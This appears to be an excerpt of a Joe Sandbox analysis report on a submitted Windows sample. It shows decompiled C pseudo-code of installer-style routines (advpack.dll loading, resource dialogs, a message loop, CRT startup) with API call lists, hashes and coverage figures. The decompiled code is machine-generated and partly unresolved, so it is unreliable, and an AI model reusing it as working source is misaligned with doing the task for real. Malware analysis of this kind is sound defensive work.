                                                                                                                                                                                                                                            0x010d38f5
                                                                                                                                                                                                                                            0x010d38fb
                                                                                                                                                                                                                                            0x010d3901
                                                                                                                                                                                                                                            0x010d3901
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d390a
                                                                                                                                                                                                                                            0x010d374b
                                                                                                                                                                                                                                            0x010d374e
                                                                                                                                                                                                                                            0x010d375c
                                                                                                                                                                                                                                            0x010d3764
                                                                                                                                                                                                                                            0x010d3769
                                                                                                                                                                                                                                            0x010d376e
                                                                                                                                                                                                                                            0x010d3771
                                                                                                                                                                                                                                            0x010d379c
                                                                                                                                                                                                                                            0x010d379f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d37a3
                                                                                                                                                                                                                                            0x010d37a4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d37a4
                                                                                                                                                                                                                                            0x010d3773
                                                                                                                                                                                                                                            0x010d3777
                                                                                                                                                                                                                                            0x010d3778
                                                                                                                                                                                                                                            0x010d377f
                                                                                                                                                                                                                                            0x010d3781
                                                                                                                                                                                                                                            0x010d378e
                                                                                                                                                                                                                                            0x010d378e
                                                                                                                                                                                                                                            0x010d3794
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3794
                                                                                                                                                                                                                                            0x010d3783
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3785
                                                                                                                                                                                                                                            0x010d378c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d378c
                                                                                                                                                                                                                                            0x010d3750
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d372d
                                                                                                                                                                                                                                            0x010d372d
                                                                                                                                                                                                                                            0x010d396b
                                                                                                                                                                                                                                            0x010d396b
                                                                                                                                                                                                                                            0x010d396c
                                                                                                                                                                                                                                            0x010d396e
                                                                                                                                                                                                                                            0x010d396f
                                                                                                                                                                                                                                            0x010d3a1e
                                                                                                                                                                                                                                            0x010d3a1e
                                                                                                                                                                                                                                            0x010d3a22
                                                                                                                                                                                                                                            0x010d3a27
                                                                                                                                                                                                                                            0x010d3a3e
                                                                                                                                                                                                                                            0x010d3a3e

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 010D3723
                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 010D39C3
                                                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,00000000,010D9154,00000030), ref: 010D39F1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$BeepVersion
                                                                                                                                                                                                                                            • String ID: 3
                                                                                                                                                                                                                                            • API String ID: 2519184315-1842515611
                                                                                                                                                                                                                                            • Opcode ID: 7d61bda374b3403e834b3013feffa4585897a21bd7994b01a128361debe79526
                                                                                                                                                                                                                                            • Instruction ID: 201fcc2067f0f0b0008407c052e0a1f22606b8824576f90aa77cc903a65bc6cc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d61bda374b3403e834b3013feffa4585897a21bd7994b01a128361debe79526
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1491C3F1F013259BEBB58A29CC81BEABBB4BB45304F0540E9D9C99F245D7758980CB43
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                                            			E010D6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed char _t14;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                            				CHAR* _t26;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t27 = __esi;
                                                                                                                                                                                                                                            				_t18 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				E010D1781( &_v268, 0x104, __ecx, 0x10d91e4);
                                                                                                                                                                                                                                            				_t26 = "advpack.dll";
                                                                                                                                                                                                                                            				E010D658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                                                            				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            0x010d6495
                                                                                                                                                                                                                                            0x010d6495
                                                                                                                                                                                                                                            0x010d64a0
                                                                                                                                                                                                                                            0x010d64a7
                                                                                                                                                                                                                                            0x010d64ab
                                                                                                                                                                                                                                            0x010d64bd
                                                                                                                                                                                                                                            0x010d64c2
                                                                                                                                                                                                                                            0x010d64d3
                                                                                                                                                                                                                                            0x010d64df
                                                                                                                                                                                                                                            0x010d64e8
                                                                                                                                                                                                                                            0x010d6502
                                                                                                                                                                                                                                            0x010d64ee
                                                                                                                                                                                                                                            0x010d64f9
                                                                                                                                                                                                                                            0x010d64f9
                                                                                                                                                                                                                                            0x010d6516

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,advpack.dll,?,010D91E4,?,00000000), ref: 010D64DF
                                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,010D91E4,?,00000000), ref: 010D64F9
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advpack.dll,?,010D91E4,?,00000000), ref: 010D6502
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                            • String ID: advpack.dll
                                                                                                                                                                                                                                            • API String ID: 438848745-3255089409
                                                                                                                                                                                                                                            • Opcode ID: c4649b320a419ba98790fa62fef9a04615e8f989990a3827c2ee8c5a1c7832fb
                                                                                                                                                                                                                                            • Instruction ID: 28ab82dc806ac34faac557ecc6fa81518b29b47e19443936c38a7d51f079da8e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4649b320a419ba98790fa62fef9a04615e8f989990a3827c2ee8c5a1c7832fb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F01D170A00208ABDB60DB64DC48EEE7778EB60310F800199F9C5931C8DF76AAC68B50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                            			E010D6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                            				struct HRSRC__* _t6;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                            				int _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t23 =  *0x10d9a3c;
                                                                                                                                                                                                                                            				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                                            					E010D44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					_t24 = _a16;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_a12 != 0) {
                                                                                                                                                                                                                                            							_push(_a12);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                                                            						FreeResource(_t21);
                                                                                                                                                                                                                                            						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            0x010d651f
                                                                                                                                                                                                                                            0x010d652a
                                                                                                                                                                                                                                            0x010d6534
                                                                                                                                                                                                                                            0x010d656b
                                                                                                                                                                                                                                            0x010d6577
                                                                                                                                                                                                                                            0x010d657c
                                                                                                                                                                                                                                            0x010d6536
                                                                                                                                                                                                                                            0x010d653e
                                                                                                                                                                                                                                            0x010d6542
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d6544
                                                                                                                                                                                                                                            0x010d6547
                                                                                                                                                                                                                                            0x010d654c
                                                                                                                                                                                                                                            0x010d6549
                                                                                                                                                                                                                                            0x010d6549
                                                                                                                                                                                                                                            0x010d6549
                                                                                                                                                                                                                                            0x010d655e
                                                                                                                                                                                                                                            0x010d6560
                                                                                                                                                                                                                                            0x010d6569
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d6569
                                                                                                                                                                                                                                            0x010d6542
                                                                                                                                                                                                                                            0x010d6587

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(?,000007D6,00000005), ref: 010D652A
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,010D2EE8,00000000,010D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010D6538
                                                                                                                                                                                                                                            • DialogBoxIndirectParamA.USER32(?,00000000,00000547,010D19E0,00000000), ref: 010D6557
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,010D2EE8,00000000,010D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010D6560
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1214682469-0
                                                                                                                                                                                                                                            • Opcode ID: 0ab2235986e5f279fe6477af862cc22b1593146f91b9bd11e7a1315d78895f17
                                                                                                                                                                                                                                            • Instruction ID: aed24e866c42ca637af8de384db66d35843b2eb02d502c4f3ca50b76f4d709af
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ab2235986e5f279fe6477af862cc22b1593146f91b9bd11e7a1315d78895f17
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF012672201305BBDB205EAD9C08DBB7AACEB85360F400165FE8093148DB77DD9087E0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D3680(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct tagMSG _v36;
                                                                                                                                                                                                                                            				int _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                                            				_t16 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                                                            					if(_t8 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							if(_v36.message != 0x12) {
                                                                                                                                                                                                                                            								DispatchMessageA( &_v36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t16 = 1;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                                                            						} while (_t8 != 0);
                                                                                                                                                                                                                                            						if(_t16 == 0) {
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t8;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            0x010d368c
                                                                                                                                                                                                                                            0x010d368f
                                                                                                                                                                                                                                            0x010d3691
                                                                                                                                                                                                                                            0x010d369f
                                                                                                                                                                                                                                            0x010d36a7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d36ba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d36bc
                                                                                                                                                                                                                                            0x010d36bc
                                                                                                                                                                                                                                            0x010d36c0
                                                                                                                                                                                                                                            0x010d36cb
                                                                                                                                                                                                                                            0x010d36c2
                                                                                                                                                                                                                                            0x010d36c4
                                                                                                                                                                                                                                            0x010d36c4
                                                                                                                                                                                                                                            0x010d36da
                                                                                                                                                                                                                                            0x010d36e0
                                                                                                                                                                                                                                            0x010d36e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d36e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d36ba
                                                                                                                                                                                                                                            0x010d36ed

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 010D369F
                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010D36B2
                                                                                                                                                                                                                                            • DispatchMessageA.USER32(?), ref: 010D36CB
                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010D36DA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2776232527-0
                                                                                                                                                                                                                                            • Opcode ID: 7dd9e101b02d87f06a4b2265e03ef31e53d55ec63d90d0763abd4d60bcfe7f81
                                                                                                                                                                                                                                            • Instruction ID: 2c918aecab8941edd42efaa1b25861f3cb36b8ff51b8bc4c3f93e1ca00d6e39e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7dd9e101b02d87f06a4b2265e03ef31e53d55ec63d90d0763abd4d60bcfe7f81
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 590184B6A01214BBDB304AAA5C48EEB7ABCFB8AB10F004159BE55E6184D5658540CB71
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                                            			E010D65E8(char* __ecx) {
                                                                                                                                                                                                                                            				char _t3;
                                                                                                                                                                                                                                            				char _t10;
                                                                                                                                                                                                                                            				char* _t12;
                                                                                                                                                                                                                                            				char* _t14;
                                                                                                                                                                                                                                            				char* _t15;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t12 = __ecx;
                                                                                                                                                                                                                                            				_t15 = __ecx;
                                                                                                                                                                                                                                            				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                            				_t10 = 0;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t3 =  *_t12;
                                                                                                                                                                                                                                            					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                            				} while (_t3 != 0);
                                                                                                                                                                                                                                            				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                            					if(_t16 <= _t15) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                                            						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                            							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t16 = _t10;
                                                                                                                                                                                                                                            						_t10 = 1;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(_t16);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return _t10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            0x010d65e8
                                                                                                                                                                                                                                            0x010d65ed
                                                                                                                                                                                                                                            0x010d65ef
                                                                                                                                                                                                                                            0x010d65f2
                                                                                                                                                                                                                                            0x010d65f4
                                                                                                                                                                                                                                            0x010d65f4
                                                                                                                                                                                                                                            0x010d65f6
                                                                                                                                                                                                                                            0x010d65f7
                                                                                                                                                                                                                                            0x010d6608
                                                                                                                                                                                                                                            0x010d6611
                                                                                                                                                                                                                                            0x010d6618
                                                                                                                                                                                                                                            0x010d661c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d660e
                                                                                                                                                                                                                                            0x010d6623
                                                                                                                                                                                                                                            0x010d6625
                                                                                                                                                                                                                                            0x010d663b
                                                                                                                                                                                                                                            0x010d663b
                                                                                                                                                                                                                                            0x010d663d
                                                                                                                                                                                                                                            0x010d6641
                                                                                                                                                                                                                                            0x010d6610
                                                                                                                                                                                                                                            0x010d6610
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d6610
                                                                                                                                                                                                                                            0x010d6644
                                                                                                                                                                                                                                            0x010d6647
                                                                                                                                                                                                                                            0x010d6647
                                                                                                                                                                                                                                            0x010d6621
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,010D2B33), ref: 010D6602
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 010D6612
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 010D6629
                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 010D6635
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Prev$Next
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3260447230-0
                                                                                                                                                                                                                                            • Opcode ID: 5b827f8f8263e58e8eedc8f8458702f2d122e1d97f0ed40b0ec5e91d0d2f51b0
                                                                                                                                                                                                                                            • Instruction ID: 350d4777d784009302cb0baba25f53c697e9720eb24dbe78834dcdf360136711
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b827f8f8263e58e8eedc8f8458702f2d122e1d97f0ed40b0ec5e91d0d2f51b0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6F0F436105250AEE7330A3C88888BBBFDCCF8F19471901EFF8D183101D61B0A468761
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D69B0() {
                                                                                                                                                                                                                                            				intOrPtr* _t4;
                                                                                                                                                                                                                                            				intOrPtr* _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				intOrPtr _t11;
                                                                                                                                                                                                                                            				intOrPtr _t12;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				 *0x10d81f8 = E010D6C70();
                                                                                                                                                                                                                                            				__set_app_type(E010D6FBE(2));
                                                                                                                                                                                                                                            				 *0x10d88a4 =  *0x10d88a4 | 0xffffffff;
                                                                                                                                                                                                                                            				 *0x10d88a8 =  *0x10d88a8 | 0xffffffff;
                                                                                                                                                                                                                                            				_t4 = __p__fmode();
                                                                                                                                                                                                                                            				_t11 =  *0x10d8528; // 0x0
                                                                                                                                                                                                                                            				 *_t4 = _t11;
                                                                                                                                                                                                                                            				_t5 = __p__commode();
                                                                                                                                                                                                                                            				_t12 =  *0x10d851c; // 0x0
                                                                                                                                                                                                                                            				 *_t5 = _t12;
                                                                                                                                                                                                                                            				_t6 = E010D7000();
                                                                                                                                                                                                                                            				if( *0x10d8000 == 0) {
                                                                                                                                                                                                                                            					__setusermatherr(E010D7000);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E010D71EF(_t6);
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x010d69b7
                                                                                                                                                                                                                                            0x010d69c2
                                                                                                                                                                                                                                            0x010d69c8
                                                                                                                                                                                                                                            0x010d69cf
                                                                                                                                                                                                                                            0x010d69d8
                                                                                                                                                                                                                                            0x010d69de
                                                                                                                                                                                                                                            0x010d69e4
                                                                                                                                                                                                                                            0x010d69e6
                                                                                                                                                                                                                                            0x010d69ec
                                                                                                                                                                                                                                            0x010d69f2
                                                                                                                                                                                                                                            0x010d69f4
                                                                                                                                                                                                                                            0x010d6a00
                                                                                                                                                                                                                                            0x010d6a07
                                                                                                                                                                                                                                            0x010d6a0d
                                                                                                                                                                                                                                            0x010d6a0e
                                                                                                                                                                                                                                            0x010d6a15

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 010D6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 010D6FC5
                                                                                                                                                                                                                                            • __set_app_type.MSVCRT ref: 010D69C2
                                                                                                                                                                                                                                            • __p__fmode.MSVCRT ref: 010D69D8
                                                                                                                                                                                                                                            • __p__commode.MSVCRT ref: 010D69E6
                                                                                                                                                                                                                                            • __setusermatherr.MSVCRT ref: 010D6A07
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1632413811-0
                                                                                                                                                                                                                                            • Opcode ID: df4ed87496422af2e75684e81de96fef5c0aa240d16a41e368b06c9d3ae3d542
                                                                                                                                                                                                                                            • Instruction ID: e9d79926b77dc85f9fdf045a933b12e3c7408e8d0c93c7ec04f942a72490e41e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df4ed87496422af2e75684e81de96fef5c0aa240d16a41e368b06c9d3ae3d542
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70F0F274606302CFC778AB3AE50A7283BA1FB04321B10864AECE2862D8CB3F85408B10
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:60.7%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
